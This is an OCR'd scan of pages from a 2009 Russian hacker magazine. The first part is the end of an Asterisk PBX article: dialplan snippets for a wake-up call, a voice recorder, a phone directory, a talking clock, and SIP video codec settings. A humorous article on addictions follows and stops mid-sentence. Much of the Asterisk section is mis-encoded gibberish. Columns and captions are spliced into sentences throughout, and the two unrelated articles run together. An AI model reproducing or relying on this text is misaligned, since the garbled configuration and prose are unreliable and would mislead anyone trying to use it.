Ïðèíöèï çàïóñêà ñêðèïòà àíàëîãè÷åí ïðèìåðó ñ Motion 

— ïðîñòî çàíîñèì â extensions.conf èíôîðìàöèþ î íîâîì 

íîìåðå: 


exten => *97,n,AGI(wakeup.php) 


Òåïåðü äîñòàòî÷íî ïîçâîíèòü íà íîìåð *97 è ïî çàïðîñó ââåñòè 

âðåìÿ, êîãäà ñèñòåìà äîëæíà ïðîèçâåñòè îáðàòíûé çâîíîê. 

Íàïðèìåð, ÷òîáû çàâåñòè áóäèëüíèê íà 17:55 (ñåãîäíÿ 

ôèíàë êóáêà àíãëèéñêîé ëèãè :)), íàáèðàåì «0555», à çàòåì 

«2» (1 — äî ïîëóäíÿ, 2 — ïîñëå ïîëóäíÿ). 

Åñëè ïðè çàïóñêå ñêðèïòà âîçíèêëè ïðîáëåìû, äîóñòàíîâè 

ïàêåòû php5-cli è asterisk-sound-extra è èñïîëüçóé óòèëèòó 

fromdos, ÷òîáû ïðèâåñòè wakeup.php ê Unix-ñòàíäàðòàì. 

ВИРТУАЛЬНЫЙ ДИКТОФОН Äèñòðèáóòèâíûé êîìïëåêò 

Asterisk è ïàêåò äîïîëíåíèé asterisk-sounds ñîäåðæàò îêîëî 

1000 ãîëîñîâûõ ñîîáùåíèé íà àíãëèéñêîì ÿçûêå (ãîëîñ ïðèíàäëåæèò 

äàìî÷êå ïî èìåíè Allison Smith). Â êà÷åñòâå àëüòåðíàòèâû 

ìîæíî çàïèñàòü ìåññàäæè íà ðóññêîì/óêðàèíñêîì/ñóàõèëè 

ñàìîñòîÿòåëüíî, íî äëÿ ýòîãî íåîáÿçàòåëüíî 

ïðèáåãàòü ê àóäèîðåäàêòîðó òèïà Audacity. Íèæåñëåäóþùåå 

äîïîëíåíèå â äèàëïëàí îáåñïå÷èò âîçìîæíîñòü çâîíèòü íà 

íîìåð *98 è çàïèñûâàòü ñîîáùåíèÿ â ïàïêó /tmp ïîä èìåíàìè 

myrecordÍÎÌÅÐ.wav. Ïîñëå çàâåðøåíèÿ çàïèñè (îñóùåñòâëÿåòñÿ 

íàæàòèåì #) çâóêîâîé ôàéë áóäåò âîñïðîèçâåäåí, 

è ñîåäèíåíèå ðàçîðâåòñÿ. Ïðèìå÷àíèå: ÷òîáû óðîâåíü 

ãðîìêîñòè áûë ïîñòîÿííûì, à «áåëûé» øóì, ñîçäàâàåìûé 

ñèñòåìàìè îòîïëåíèÿ/îõëàæäåíèÿ/êîíäèöèîíèðîâàíèÿ, 

ñâåäåí ê ìèíèìóìó, äëÿ çàïèñè ëó÷øå âîñïîëüçîâàòüñÿ àïïàðàòíûì 

VoIP-òåëåôîíîì. 


exten => *98,n,Wait(2) 

info 

Существует патч 

от разработчика с 

ником IVeS (смотри 

на нашем диске файл 

videocodec_nego_fix_ 

ast-1.4.13.patch.gz), в 

котором проблема согласования 

кодеков 

устранена, но сама 

заплатка до сих пор 

не принята Digium. 

video 

В видеоролике мы 

разберем некоторые 

трюки с Asterisk: 

говорящие часы, 

будильник, виртуальный 

диктофон и телефонный 

справочник. 

117

ХАКЕР.PRO 

SYN/ACK 

Список доступных аудио- и видеокодеков 

Сегодня доступно две ветки Asterisk: 1.4 и 1.6 

Проверяем настройки Motion 

exten => *98,n,Record(/tmp/myrecord%d:wav) 


exten => *98,n,Playback(${RECORDED_FILE}) 



äèàëïëàíà, â êîòîðîì âûçûâàåòñÿ àáîíåíò: 

exten => *99,1,Directory(default,internal) 

Ñîçäàåì ïî÷òîâûé ÿùèê â ôàéëå voicemail.conf: 

Íå çàáóäü ñêîïèðîâàòü/ïåðåíåñòè ïîëó÷åííûé ôàéë èç âðåìåííîé äèðåêòîðèè 

â ïàïêó äëÿ çâóêîâûõ ôàéëîâ Asterisk è íàäåëèòü åãî êàêèìíèáóäü 

îñìûñëåííûì èìåíåì, âðîäå privetstvie.wav. Êñòàòè, ãîëîñîâûå 

ñîîáùåíèÿ ëó÷øå íå êîíâåðòèðîâàòü â gsm/mp3/ogg, ÷òîáû íà ïðîö íå 

ëåãëà äîïîëíèòåëüíàÿ íàãðóçêà ïî ïðåîáðàçîâàíèþ. 

ТЕЛЕФОННЫЙ СПРАВОЧНИК Åñëè â êîìïàíèè èñïîëüçóåòñÿ áîëåå 

òðåõ äîáàâî÷íûõ íîìåðîâ, áåç òåëåôîííîãî ñïðàâî÷íèêà íå îáîéòèñü. 

Ñîòðóäíèêè íà÷èíàþò ïóòàòü öèôðû, çàáûâàòü íîìåðà, íåðâíè÷àòü è 

äåð ãàòü ïî ïóñòÿêàì àäìèíà. Áóìàæíûå âàðèàíòû ñïðàâî÷íèêà è ýêñåëåâñêèå 

òàáëè÷êè îñòàâèì â ïðîøëîì. Ïðèëîæåíèå Directory(), èñïîëüçóÿ 

èìåíà, çàäàííûå â îïèñàíèÿõ ãîëîñîâûõ ïî÷òîâûõ ÿùèêîâ, ïðåäîñòàâëÿåò 

òåëåôîííûé ñïðàâî÷íèê àáîíåíòîâ îôèñíîé ÀÒÑ äëÿ íàáîðà 

íîìåðîâ ïî èìåíè. Â êà÷åñòâå àðãóìåíòîâ äèðåêòèâû íóæíî ïîäñòàâèòü 

êîíòåêñò ãîëîñîâîé ïî÷òû, èç êîòîðîãî ñ÷èòûâàþòñÿ èìåíà, è êîíòåêñò 

118 

[default] 

401 => 1234,Andrey Matveev,andrushock@real.xakep.ru 

Íà êëàâèàòóðå ñîôòîôîíà íàáèðàåì *99, çàòåì ïåðâûå òðè áóêâû ôàìèëèè 

ïîëüçîâàòåëÿ, íîìåð êîòîðîãî ìû õîòèì óçíàòü (â äàííîì ñëó÷àå — 

«mat»). Allison Smith íà÷íåò ïî áóêâàì «çà÷èòûâàòü» èç voicemail.conf èìÿ 

è ôàìèëèþ íàéäåííîãî àáîíåíòà: «a-n-d-r-e-y m-a-t-v-e-e-v». Ïîäòâåðæäàåì 

ïðàâèëüíîñòü âûáîðà íàæàòèåì «1». Âèðòóàëüíûé îïåðàòîð ïðîãîâîðèò 

äîáàâî÷íûé íîìåð 401 (åñëè â äèàëïëàíå èñïîëüçóåòñÿ êîíñòðóêöèÿ 

âèäà «exten => _XXX,1,SayDigits(${EXTEN})») è ïðîèçâåäåò ñîåäèíåíèå. 

Î÷åíü óäîáíî! 

КОТОРЫЙ ЧАС? Îêàçûâàåòñÿ, ñëóæáà òî÷íîãî âðåìåíè — íåâåðîÿòíî 

ïîïóëÿðíûé ñåðâèñ: ñóäÿ ïî ìàòåðèàëó èç Âèêèïåäèè, åæåäíåâíî ïî 

íîìåðó 100 çâîíÿò îêîëî ìèëëèîíà ìîñêâè÷åé. Ìîæåò áûòü, ïîéäåì íà- 

XÀÊÅÐ 04 /124/ 09

SYN/ACK ХАКЕР.PRO 

âñòðå÷ó ÌÃÒÑ (èëè òâîåé ãîðîäñêîé òåëåôîííîé ñòàíöèè) 

è ÷óòî÷êó ðàçãðóçèì èõ îáîðóäîâàíèå çà ñ÷åò ñîçäàíèÿ ñâîèõ 

«ãîâîðÿùèõ ÷àñîâ»? Â ýòîì íàì ïîìîæåò ïðèëîæåíèå 

SayUnixTime(), ïðîãîâàðèâàþùåå óêàçàííîå âðåìÿ â îïðåäåëåííîì 

ôîðìàòå: 


exten => *100,n,SayUnixTime(,,QdhAR) 

exten => *100,n,WaitMusicOnHold(10) 

exten => *100,n,Goto(*100,1) 

Íàáèðàåì *100, Allison Smith ïðèâåòëèâî ñîîáùàåò î òîì, 

÷òî ñåé÷àñ 1 ìàðòà, âîñêðåñåíüå, 14 ÷àñîâ è 50 ìèíóò. Çàòåì 

âîñïðîèçâîäèòñÿ 10-ñåêóíäíàÿ ìóçûêàëüíàÿ ïàóçà (ïóòü 

ê ïàïêå ñ ìóçîíîì çàäàåòñÿ ïàðàìåòðîì directory â ôàéëå 

musiconhold.conf), è âûçîâ íîìåðà ïîâòîðÿåòñÿ (íà òîò ñëó- 

÷àé, åñëè ìû ÷òî-òî íå ðàññëûøàëè). 

БУДУЩЕЕ ТЕЛЕФОНИИ ЗА ВИДЕОЗВОНКАМИ 

Èçíà÷àëüíî âîïðîñ î ïîääåðæêå âèäåîñâÿçè ïåðåä ðàçðàáîò- 

÷èêàìè íå ñòàâèëñÿ, îäíàêî ñåãîäíÿ íåîáõîäèìîñòü â òàêîé 

ôóíêöèîíàëüíîñòè î÷åâèäíà. Êðîìå òîãî, âû÷èñëèòåëüíûå VoIP-софтофон Ekiga умеет работать с видео 

ìîùíîñòè ìíîãîêðàòíî âîçðîñëè, òðàôèê ïîäåøåâåë, à ïðîïóñêíàÿ 

ñïîñîáíîñòü êàíàëîâ ïîçâîëÿåò ãîíÿòü âèäåîïîòîê õîðîøåãî 

êà÷åñòâà. Òàê èëè èíà÷å, íî ïîääåðæêà âèäåî â Asterisk allow=h264 

allow=ilbc 

1.4 íàõîäèòñÿ â çà÷àòî÷íîì ñîñòîÿíèè (ïëîõîå ñîãëàñîâàíèå allow=h261 

êîäåêîâ, íå ðàñïîçíàþòñÿ ðàñøèðåííûå àòðèáóòû äëÿ âèäåîïîòîêîâ, 

íå ïîääåðæèâàþòñÿ ïîïóëÿðíûå âèäåîôîðìàòû, íåò 

âîçìîæíîñòè ïåðåêîäèðîâêè è ò.ä.). ×àñòü ïåðå÷èñëåííîãî, 

âåðîÿòíî, òàê íèêîãäà è íå ïîÿâèòñÿ â Asterisk, â òîì ÷èñëå, èççà 

âîçìîæíûõ ïðîáëåì ñ ëèöåíçèðîâàíèåì. Íàïðèìåð, ðàçðàáîò÷èêè 

íå ìîãóò èñïîëüçîâàòü áèáëèîòåêó ffmpeg, õîòÿ ñåãîäíÿ 

óæå äîñòóïíî ïðèëîæåíèå app_transcoder (sip.fontventa. 

com/content/view/30/57), ðàáîòàþùåå ñ ffmpeg è èìåþùåå 

îãðàíè÷åííûå ôóíêöèè, ñâÿçàííûå ñ ïåðåêîäèðîâàíèåì. Â 

íîâîé âåðñèè 1.6 ïëàíèðîâàëèñü íåêîòîðûå ïîäâèæêè â ýòîì 

íàïðàâëåíèè, â ÷àñòíîñòè, ïîëíàÿ ïåðåñòðîéêà ïîääåðæêè âèäåî 

â êàíàëàõ (òàê íàçûâàþòñÿ ñîåäèíåíèÿ â Asterisk), íî ïîêà tos_video=af41 

äàëüøå èäåé äåëî íå ïîøëî. 

Èç âñåãî ìíîæåñòâà êàíàëîâ ïåðåäà÷à âèäåî ðåàëèçîâàíà 

òîëüêî â äâóõ — SIP è IAX2. Íåêîòîðûå ïîïóëÿðíûå ðåàëèçàöèè 

(chan_h323, chan_oh323, chan_ooh323) ñòàðîãî äîáðîãî 

H.323 íå îáåñïå÷èâàþò òàêîé âîçìîæíîñòè, õîòÿ â ñàìîì tos=0x18 

ñòàíäàðòå H.323 ýòî ïðåäóñìîòðåíî. Òàê, ÷òîáû ðàçðåøèòü 

ñîâåðøàòü âûçîâû ñ ïîääåðæêîé âèäåî, äîñòàòî÷íî äîáàâèòü 

â ôàéë sip.conf ïàðàìåòð: 

[general] 

videosupport=yes 

Â IAX ýòà âîçìîæíîñòü çàëîæåíà èçíà÷àëüíî, ïîýòîìó ïàðàìåòð 

videosupport â ôàéëå iax.conf íå ïîääåðæèâàåòñÿ. 

Ñïèñîê âèäåîêîäåêîâ, óìåþùèõ ðàáîòàòü ñ âèäåî, íåâåëèê: 

H.261 (òîëüêî òðàíçèò), H.263, H.263p è H.264 (ïîñëåäíèå 

äâà ñ Asterisk âåðñèè 1.4). Íî òàê êàê Asterisk 1.4 èìååò ïðîáëåìû 

ñ ñîãëàñîâàíèåì êîäåêîâ, àêòèâèðîâàòü èõ âñå îäíîâðåìåííî 

íå ñëåäóåò. Ëó÷øå ïîäîáðàòü íàèáîëåå îïòèìàëüíûé 

äëÿ êîíêðåòíîé ñèòóàöèè, îòêëþ÷èâ îñòàëüíûå ïðè ïîìîùè 

«disallow=all». Íî íå çàáûâàé, ÷òî âûáðàííûé êîäåê äîëæåí 

ïîääåðæèâàòüñÿ è êëèåíòîì. 

disallow=all 

allow=alaw 

allow=gsm 

allow=speex 

Ïî óìîë÷àíèþ ìàêñèìàëüíûé áèòðåéò äëÿ âèäåî óñòàíîâëåí 

â 384 Êá/ñ, — åãî ìîæíî èçìåíèòü ïðè ïîìîùè äèðåêòèâû 

maxcallbitrate. 

Íåëüçÿ íå îòìåòèòü, ÷òî Asterisk óìååò çàäàâàòü áèòû TOS 

(Type of Service) â çàãîëîâêå IP-ïàêåòà, ÷òîáû óñêîðèòü ïåðåäà÷ó 

ïîòîêà äàííûõ ÷åðåç ìàðøðóòèçàòîðû, êîòîðûå ó÷èòûâàþò 

áèòû TOS ïðè îïðåäåëåíèè ìàðøðóòîâ. Â sip.conf äèðåêòèâû 

tos_sip, tos_audio è tos_video óïðàâëÿþò TOS-áèòàìè 

äëÿ SIP-ñîîáùåíèé, àóäèî- è âèäåîäàííûõ ñîîòâåòñòâåííî. 

Â iax.conf âñå ïîëÿ TOS óñòàíàâëèâàþòñÿ ïðè ïîìîùè îäíîãî 

ïàðàìåòðà: 

Â íàñòîÿùåå âðåìÿ ïåðåäà÷ó âèäåî ïîääåðæèâàåò îãðîìíîå êîëè÷åñòâî 

ñîôò-êëèåíòîâ: Ekiga, Bria, X-lite, Linphone, Milliphone, 

WengoPhone, Windows Messenger è íåêîòîðûå äðóãèå. 

ВМЕСТО ЗАКЛЮЧЕНИЯ 

×òî åùå ìîæíî ñäåëàòü ñ ïîìîùüþ Asterisk? Íàïðèìåð, 

ðàñøèðèòü ôóíêöèè óñòàðåâøåé êîììóòèðóåìîé ÀÒÑ, ñîçäàòü 

èíòåðàêòèâíûé àâòîîòâåò÷èê (ýòî ìîæåò áûòü ïðîãíîç ïîãîäû 

äëÿ ëþáîé òî÷êè çåìíîãî øàðà, îáó÷àþùàÿ ïðîãðàììà èëè 

àóäèîèãðà — îòâåòû ìîæíî ââîäèòü ïîñðåäñòâîì íîìåðîíàáèðàòåëÿ 

òåëåôîíà), îðãàíèçîâàòü àóäèîêîíôåðåíö-çàëû, ÷èòàòü 

ýëåêòðîííóþ ïî÷òó âñëóõ, êîãäà òû, íàïðèìåð, â äîðîãå èëè ïðèíèìàåøü 

âàííó (ñâÿçêà Asterisk + Festival), óïðàâëÿòü ñèñòåìîé 

ñèãíàëèçàöèè, êîíòðîëèðîâàòü íÿíþ è äåòåé (äîïóñòèì, ìàòü è 

îòåö, ñèäÿ íà ðàáîòå, ïîäêëþ÷àþòñÿ VPN-êëèåíòîì ê äîìàøíåìó 

ñåðâåðó, çâîíÿò â êîíòåêñò äîáàâî÷íîãî íîìåðà, çàùèùåííîãî 

ïàðîëåì, ïîñëå óñïåøíîé àóòåíòèôèêàöèè óñòàíàâëèâàåòñÿ 

àóäèîñâÿçü ñî âñåìè IP-òåëåôîíàìè â êâàðòèðå — ýòî ïîçâîëèò 

ðîäèòåëÿì ñëûøàòü, ÷òî ïðîèñõîäèò â êàæäîé êîìíàòå, — ñâîåîáðàçíûå 

VoIP-æó÷êè). Ïðîÿâè òâîð÷åñêèå ñïîñîáíîñòè, çàìóòè 

÷òî-íèáóäü ýêñòðàîðäèíàðíîå è íàïèøè íàì :). z 

links 

• Все возможности 

по инициированию 

исходящего звонка 

в Asterisk ты найдешь 

в документе «Asterisk 

auto-dial out» — 

www.voip-info.org/ 

wiki-Asterisk+autodial+out. 

• Описание всех 

известных проблем, 

связанных с передачей 

видео, можно 

найти в списке рассылки 

Asterisk-Video 

(lists.digium.com/ 

pipermail/asteriskvideo). 

XÀÊÅÐ 04 /124/ 09 

119

units 

АЛЕКСАНДР ЛОЗОВСКИЙ 

/ LOZOVSKY@GAMELAND.RU / 

PSYCHO: 

ДЕНЬ ЗАВИСИМОСТИ (2009, VHSRIP) 

ПОЛНЫЙ ][-ГАЙД ПО ОСНОВНЫМ АДДИКЦИЯМ 

В отличие от ролевых игр, в реальной жизни не сразу понятно, какое количество хитов 

у монстров должно быть, чтобы защититься от заклинания «гипноз», какое количество 

единиц радиации ты сможешь перенести и сколько psycho с ментами выкушать. 

С 

егодня мы поговорим о таком вредном душевном состоянии, 

как «зависимость». Зависимости подразделяются на аддикции 

(умный синоним к слову «зависимость») к психоактивным 

веществам и нехимические. К первым, как нетрудно догадаться, 

относятся многочисленные нарко- и токсикомании, а ко вторым — целый 

сонм состояний, не имеющих прямого отношения к веществам — от 

гэмблинга до компьютерной зависимости (их мы рассмотрим ниже). 

Кстати, нехимические — не означает «легкие». Науке известно немало 

людей, загремевших с ними в самый настоящий дурдом. 

Для начала, на примере наркомании мы рассмотрим определение, 

основные причины и составляющие зависимостей как таковых, а во 

второй части статьи — разберемся с частными случаями нехимических 

зависонов. 

ПСИХОАКТИВНЫЕ ВЕЩЕСТВА 

К зависимостям от психоактивных веществ относят алкоголизм, наркомании 

и токсикомании. Общие для всех этих аддикций моменты: 

• психическая и/или физическая зависимость; 

• изменение толерантности. 

Психическая зависимость — состояние, при котором все мысли нарка по 

большей части оказываются занятыми либо переживаниями предыдущих 

трипов, либо предвкушением скорого приема новой дозы. Соответственно, 

сладостное предвкушение влечет за собой некий душевный 

подъем и чувство радости, а вот облом от невозможности эту самую 

дозу своевременно принять — наоборот, депрессивное, подавленное и 

«общехреновое» душевное состояние. Со временем вирусный алгоритм 

«Найти! Уколоть!» тотально поражает вычислительные способности 

мозга и подчиняет себе все поступки индивида. 

Разумеется, психическая зависимость формируется не сама по себе и не 

у каждого. Это — результат исходного душевного состояния (чаще всего, 

расстройств личности) и действия психоактивного вещества на соответствующие 

области в головном мозге (здесь я хотел употребить любимые 

в народе термины «дофамины», «катехоламины», «эндогенные опиаты» 

и «серотонины», — но вовремя одумался). 

Исходное состояние ума имеет большое значение, ведь не каждый 

человек, принимающий ПАВ, может считаться наркоманом — «экспериментаторы», 

считающие, что в жизни надо попробовать все, способны 

без зависания пробовать разные вещества и больше никогда к ним не 

возвращаться; «эпизодические потребители» пробуют ПАВ изредка 

или по какому-нибудь поводу (в хорошей компании косячок раскурить, 

чарочку винца хмельного распить), но опять же, никакой зависимости 

у них нет, поскольку нет в их сознании доминирующей идеи принять 

любимое вещество снова. По-настоящему зависимые товарищи — это 

120 

наркоманы, торчащие (распивающие, играющие, нюхающие — нужное 

подчеркнуть) постоянно. Именно у представителей этой «группы» развиваются 

все три признака зависимости, из которых мы пока рассмотрели 

лишь один. Исправим ситуацию! 

Физическая зависимость — для простоты произнесу всего одно популярное 

в народе слово: «абстинентный синдром». Он же — «синдром 

лишения». Рассмотрим на примере. Если человек на утро после хорошей 

выпивки не в состоянии даже смотреть на бухло — он обычный парень, 

который вчера перебрал (и у него не абстинентный, а постинтоксикационный 

синдром — следствие перенесенного отравления алкоголем). 

Если же он чувствует потребность «поправить здоровье» еще одной порцией 

спиртного — это симптом алкогольной зависимости. Практически 

то же самое касается всех остальных веществ, вызывающих физическую 

зависимость. 

Есть и третий элемент в зловещей мозаике химических зависимостей. 

Называется он «изменение толерантности». Поясню на примере алкоголизма. 

Поначалу толерантность к выпивке у пьяницы растет — и вот ему 

уже под силу употребить гораздо больше спиртного, чем раньше. Из-за 

этого он может позволить себе смотреть свысока на «не умеющую пить 

школоту» :). Правда, затем оказывается, что школота избрала себе более 

правильную судьбину, а горький пьяница, вместе с переходом в третью, 

заключительную стадию алкоголизма, испытает «срыв толерантности» 

— вынос мозга с одной-двух рюмок (вместо, скажем, литра ранее). 

То же самое характерно для большинства химических и нехимических 

зависимостей — «аппетит растет во время еды». Например, дозы морфина, 

которая отправит в реанимацию чистого душой человека, матерому 

торчку для получения оттяга может быть недостаточно. Правда, торчки 

все равно рано или поздно достигают своего фатального (или не очень) 

передоза. 

ЗАВИСИМОСТЬ ОТ АЗАРТНЫХ ИГР 

Называется эта аддикция «лудоманией» или «гэмблингом». В нашей 

стране распространилась не так давно (по галактическому летоисчислению), 

совпав с бумом казино и игровых автоматов. Отличить патологического 

игрока от игрока обычного, эпизодического, просто — вспомни 

определение зависимостей. Игромания мешает нормальной жизни? 

Занимает непростительно много времени, отвлекая от учебы, работы, 

мытья посуды и чтения «Хакера» за завтраком? Соответственно, подопытный 

получает в довесок все типичные черты наркомана — проводит 

за игрой все больше и больше времени, теряет связи с нормальной 

социальной жизнью (95% оперативной памяти в головном конце его 

туловища постоянно заполнено мыслями о прошлых играх или предвкушениями 

будущих). Он постоянно повышает ставки (то есть, «дозу»), 

XÀÊÅÐ 04 /124/ 09

units 

Револьвер, стакан спиртного и фишки недвусмысленно намекают на 

сочетание аддикций и их возможные последствия 

ДИАГНОСТИЧЕСКИЕ КРИТЕРИИ 

ЗАВИСИМОСТИ ОТ ПАВ 

Бонус от международной классификации болезней 10-го пересмотра 

— диагностические критерии зависимости от психоактивных 

веществ (в т.ч., алкоголя). Имеешь больше 3-х признаков? Поздравляем, 

— диагноз! 

1. Сильная потребность или необходимость принимать вещество. 

2. Нарушение способности контролировать прием вещества — начало, 

окончание приема, дозировку. 

3. Появление синдрома отмены, требующего повторного приема 

вещества или его аналога. 

4. Признаки изменения толерантности — увеличение или уменьшение 

необходимой дозы зелья. 

5. Прогрессирующий отказ от альтернативных интересов в пользу 

употребления вещества. 

6. Продолжение приема вещества, невзирая на очевидные вредные 

последствия. 

становится лживым, агрессивным и раздражительным (попробуй 

насильственно отлучить гэмблера от однорукого бандита ;)). Дальше — 

может втравиться в криминальные дела для решения своих финансовых 

проблем. Весьма часто такие персонажи оказываются склонны к паразитированию 

на родственниках (с работы и учебы, если таковые вообще 

были, их нередко прут). 

СЕКСУАЛЬНАЯ АДДИКЦИЯ 

Наверняка, у тебя среди знакомых числится хотя бы один персонаж, 

очень трепетно относящийся к теме секса. Он часто меняет партнеров, 

много говорит и думает о всяких срамных вещах, тусуется по разным 

ночным учреждениям вроде клубов и вообще, очень озабочен интимной 

стороной человеческих взаимоотношений. Прямо скажем, человек этот 

больным не выглядит, а в общении и сам способен объявить больным 

любого собеседника, поскольку всем ясно, что трахаться — это круто! 

«Пока вы тут со своими постоянными девушками (а то и женами, хе-хе) 

месяцами занимаетесь своими унылыми интимными телодвижениями, 

я тусуюсь, трахаюсь и живу полной жизнью». Что же в этом плохого? Если 

мы говорим об аддикции, то плохо тут следующее: 

• Подобное поведение — следствие расстройства личности и/или 

неадекватного воспитания, в процессе которого нашему испытуемому 

почему-то стало казаться, что единственное, чем он может быть заметен 

Наркотическая зависимость — заболевание, характеризующееся 

патологическим влечением к различных психоактивным веществам, 

развитием зависимости и толерантности 

в жизни — это секс. Не исключено, 

кстати, сексуальное 

насилие в детстве. 

• Общий фон настроения таких 

персонажей часто низкий, 

иначе говоря — до (и после) 

приема очередной «дозы» они 

находятся в депрессии, у них 

повышен уровень тревоги. 

• По сути дела, наш подопытный 

асоциален, и его способностям 

к сотрудничеству и 

Героин от компании Байер (прославилась 

аспирином). Очень по- 

совместному проживанию с 

другими людьми позавидовать пулярное лекарство в свое время 

нельзя. Что я подразумеваю в было :) 

этом контексте под асоциальностью? 

Перечислю ключевые слова: разгильдяйство, 

склонность к кидалову, эгоцентризм, тенденция рассматривать 

окружающих в качестве сексуальных партнеров и отсутствие 

толкового интереса к чему-либо кроме секса. В общем, все, как и в любых 

других зависимостях — в голове только одна доминирующая мысль 

и одна линия поведения. О работе, творческой деятельности и взятых на 

себя обязательствах в подобных условиях думать трудно. 

• Беспорядочный трах, от которого нас предостерегал еще Лука Мудищев, 

ведет к заражению болезнями, которые наши с тобой героические 

предки называли «гусарским насморком». Правда, о гепатитах и СПИДе 

тогда еще не знали. 

• Эта зависимость с большой частотой сочетается с другими — наркоманией 

(ну, как не нюхнуть кокаинчика или не закинуть на кишку немножечко 

спидов?), гэмблингом, шопоголизмом и тому подобными. 

Кстати, хочу тебя предостеречь от преждевременных суждений — не 

каждый субъект, у которого бывает более одного партнера за месяц, 

может считаться зависимым. Может, просто стиль жизни такой :). 

РАБОТОГОЛИЗМ 

С самого момента основания «zакера», еще при SINtez’e, мы вынашивали 

секретный план наводнить штат журнала безумными трудоголиками, 

спекулируя на их стремлении убежать от реальности, погрузившись в 

работу, на страхе показаться некомпетентными, на гипертрофированной 

ответственности за результат («как же они там без меня справятся?»)… 

не вышло. Мы пробовали бомбардировать мозг авторов медленными 

нейтронами и воздействовать на них токами высокого напряжения и 

сверхнизкой частоты — ничего не получилось. Как они были разгиль- 

XÀÊÅÐ 04 /124/ 09 

121

units 

Игра в компьютерный преферанс с ЭВМ еще никого не сделала аддиктом, 

а мозги прочищает не хуже тетриса :) 

дяями, так и остались. А может, оно и к лучшему? Ведь работоголик 

представляет собой организм довольно зомбированный, контркреативный 

(да-да, крутую тему для статьи и ништяковый дизайн обложки он 

придумать, скорее всего, неспособен) и невеселый. Посмотрел бы я на 

тебя, будь ты работоголиком! Веселиться тут трудно — пришел на службу 

с утречка, ближе к ночи свалил домой, а дома что? Дома ждет унылая 

ругань с родичами. Причем, он их прессует по полной — для оправдания 

своей зависимости у него есть целая легенда, с которой не поспоришь: 

и деньги-то он зарабатывает, и карьеру делает, и работает один во всем 

офисе, поскольку все дураки, а только он умный. Одним словом, работоголикам 

нужна психиатрическая помощь. 

В 11-й серии 1-го сезона «Доктор Хаус» абстинентный синдром мешает 

главному герою мыслить здраво и может стать причиной смерти пациента 

физическое насилие со стороны родных и близких? 

КОМПЬЮТЕРНАЯ АДДИКЦИЯ 

Скрывать нечего — мы с тобой хорошо знаем, что собой представляют 

эти сомнительные, зависимые от персональной электронновычислительной 

машины, люди :). Кто-то дни и ночи напролет проводит 

в линеечку, контру и вовец, забывая про сон, еду и завтрашнюю сессию, 

кто-то отвисает на форумах до тех пор, пока в интернетах не кончатся 

несогласные с ними люди, а иные, особо злокачественные персонажи, 

слишком увлекаются рассматриванием голых женщин или даже 

вульгарно-натуралистических изображений половых актов все в той 

же многострадальной Сети. Поэтому, друг мой, я не буду тебе ничего 

рассказывать о компьютерных аддиктах (кто хочет — пусть гуглит на 

предмет терминов «хикки», «нерд», «задрот» и т.п.). Вместо этого я 

немного побеседовал со специализирующимся на этой зависимости 

врачом-психиатром, психотерапевтом, к.м.н., СНС московского НИИ 

психиатрии, преподавателем и консультантом Института психотерапии и 

клинической психологии, Виталиной Александровной Лоскутовой. 

z Есть ли информация, какие зависимости из группы «компьютерных» 

сейчас лидируют? Игры, интернет-общение и прочее? 

В.А. Возможно, существует более точная статистика, а навскидку могу 

сказать, что лидируют интернет-общение и интернет-игры (что, по сути, и 

есть то же самое интернет-общение, только в контексте игры). 

z Известно, что тесты для выявления этой аддикции существуют. А что 

делать тем, у кого сей тест на беременность окажется положительным? 

В.А. Обращаться к психотерапевту (ïñèõîòåðàïåâò ó íàñ â ñòðàíå 

— ýòî ïñèõèàòð, ïðîøåäøèé äîïîëíèòåëüíîå îáó÷åíèå ïî ïñèõîòåðàïèè 

— Ïðèì. ðåä.). Только давайте все-таки определим рамки 

аддикции: мы говорим о сформированной зависимости, как о проблеме, 

требующей решения (лечения), тогда, когда страдает физическое или 

психическое здоровье, или социальная жизнь — работа, учеба, отношения 

с родными/друзьями и так далее. 

z А нельзя ли справиться своими силами или силами окружающих? Например, 

лечебное привязывание, электротерапия в домашних условиях, 

В.А. Возможно, — и я знаю подобные случаи. Для этого нужно, чтобы 

человек осознал наличие проблемы и имел желание ее решить. Хорошо, 

когда зависимого человека поддерживают близкие. При этом насилие 

категорически противопоказано. Вообще, с зависимыми плохо работают 

стратегии защиты и контроля, а хорошо — стратегия сотрудничества. 

z А в каких медицинских учреждениях стоит искать исцеление? Платно, 

бесплатно? 

В.А. В психоневрологическом диспансере или наркологическом диспансере 

по месту жительства и некоторых районных поликлиниках — 

психотерапевтическую помощь можно получить бесплатно, а за деньги 

— в медцентрах. Кроме того, получить бесплатную помощь по направлению 

ПНД или НД можно в Московском НИИ психиатрии, Национальном 

научном центре наркологии или в ГНЦССП им. Сербского. 

z А в чем заключается лечение? 

В.А. Психотерапия — в обязательном порядке, медикаментозная терапия 

— по показаниям. 

z Но бить и привязывать к кровати точно не будете? 

В.А. Если будете себя хорошо вести — нет. 

ШОПОГОЛИЗМ 

Слово, как бы намекающее на «-голизм, вызванный шопингом», появилось 

в нашем лексиконе относительно недавно (подозреваю, без влияния 

зомбоящика не обошлось!), а в целом, проблемой «аддикции к трате 

денег» психиатры занимаются уже около семнадцати лет (предпосылки 

возникли и того раньше). Как нетрудно догадаться, эта зависимость 

поражает умы преимущественно представительниц прекрасного пола 

(более 90% страдающих — женщины), и проявляется она совершенно 

непонятными для мужского мозга вещами, такими как: 

• Склонностью к совершению большого количества покупок, в том числе, 

явно не нужных и совершенных в долг (вопросы выплат по кредитам в 

статье не рассматриваются; они всплывут позже, возможно, даже став 

122 

XÀÊÅÐ 04 /124/ 09

units 

В фильме «Шопоголик» (снятом по одноименной серии книг) молодая 

девушка, помешанная на шопинге и дорогой одежде, живет в состоянии 

войны между своим банковским лимитом и искушениями большого 

города 

причиной короткого раскаяния, которое все равно к излечению не приведет). 

• Имеют место вспышки острого желания что-нибудь да приобрести. 

Отсутствие возможности реализовать это желание приводит аддикта в состояние, 

схожее с ощущениями наркомана, который не может принять дозу. 

• Ясное дело, что «покупочная аддикция» серьезно мешает повседневной 

жизни, в том числе и тем, что наша подопытная может провести в магазине 

гораздо больше времени, чем планировалось (если она вообще 

планировала туда идти), и потратить там много денег. Либо, как я уже 

говорил, влезть в кредит, который непонятно кто потом будет отдавать. 

Кстати, бывает так, что даже самый обычный и нормальный человек, 

зайдя в гипермаркет купить пару пива и чипсов с креветками, вдруг 

обнаруживает себя на кассе с корзинкой товаров и чеком на 4-8 тысяч 

деревянных. Почему так происходит? Послушаем бедолагу. «Все это 

было мне нужно, — лепечет он. — Штаны новые нужны, вроде и сока 

